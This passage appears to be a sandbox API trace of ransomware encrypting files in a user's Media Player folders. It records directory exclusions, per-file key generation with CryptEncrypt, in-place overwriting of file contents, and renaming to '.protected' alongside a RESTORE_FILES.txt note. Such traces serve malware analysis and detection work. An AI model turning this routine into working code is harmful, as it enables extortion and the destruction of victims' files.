Files") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.905] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.905] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\.") returned 72 [0084.905] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.905] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.906] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.906] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.906] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.906] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\..") returned 73 [0084.906] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.906] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Windows") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="Program Files (x86)") returned -1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="$Recycle.bin") returned 1 [0084.906] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="System Volume Information") returned -1 [0084.906] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrIW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".protected") returned 0x0 [0084.906] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0084.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.906] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".rar") returned 0x0 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0084.906] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".zip") returned 0x0 [0084.907] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.913] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.914] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.914] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.914] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.916] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.916] CloseHandle (hObject=0x14c) returned 1 [0084.916] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected") returned 105 [0084.916] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.protected")) returned 1 [0084.917] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Windows") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="Program Files (x86)") returned -1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="$Recycle.bin") returned 1 [0084.917] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="System Volume Information") returned -1 [0084.917] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.917] StrStrIW (lpFirst="LocalMLS_3.wmdb", lpSrch=".protected") returned 0x0 [0084.917] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="RESTORE_FILES.txt") returned -1 [0084.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".txt") returned 0x0 [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".rar") returned 0x0 [0084.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 86 [0084.918] StrStrW (lpFirst="LocalMLS_3.wmdb", lpSrch=".zip") returned 0x0 [0084.918] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.931] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.931] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.931] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.931] CloseHandle (hObject=0x14c) returned 1 [0084.931] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected") returned 96 [0084.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.protected")) returned 1 [0084.932] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="Windows") returned -1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="Program Files (x86)") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="$Recycle.bin") returned 1 [0084.932] lstrcmpiW (lpString1="Sync Playlists", lpString2="System Volume Information") returned -1 [0084.932] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 85 [0084.932] lstrcmpW (lpString1="Sync Playlists", lpString2=".") returned 1 [0084.932] lstrcmpW (lpString1="Sync Playlists", lpString2="..") returned 1 [0084.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned 87 [0084.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\.") returned 87 [0084.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\..") returned 88 [0084.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0084.933] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0084.933] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 91 [0084.933] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0084.933] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 93 [0084.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.934] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.934] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\.") returned 93 [0084.934] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\..") returned 94 [0084.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Windows") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Program Files") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="Program Files (x86)") returned -1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="$Recycle.bin") returned 1 [0084.934] lstrcmpiW (lpString1="0000E713", lpString2="System Volume Information") returned -1 [0084.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned 100 [0084.935] lstrcmpW (lpString1="0000E713", lpString2=".") returned 1 [0084.935] lstrcmpW (lpString1="0000E713", lpString2="..") returned 1 [0084.935] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*") returned 102 [0084.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\.") returned 102 [0084.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.940] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\..") returned 103 [0084.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.940] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.940] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.940] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.940] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0084.941] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.941] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0084.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0084.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.942] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.943] CloseHandle (hObject=0x158) returned 1 [0084.943] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 145 [0084.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0084.943] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.944] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.944] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.944] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.944] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.944] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.944] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync 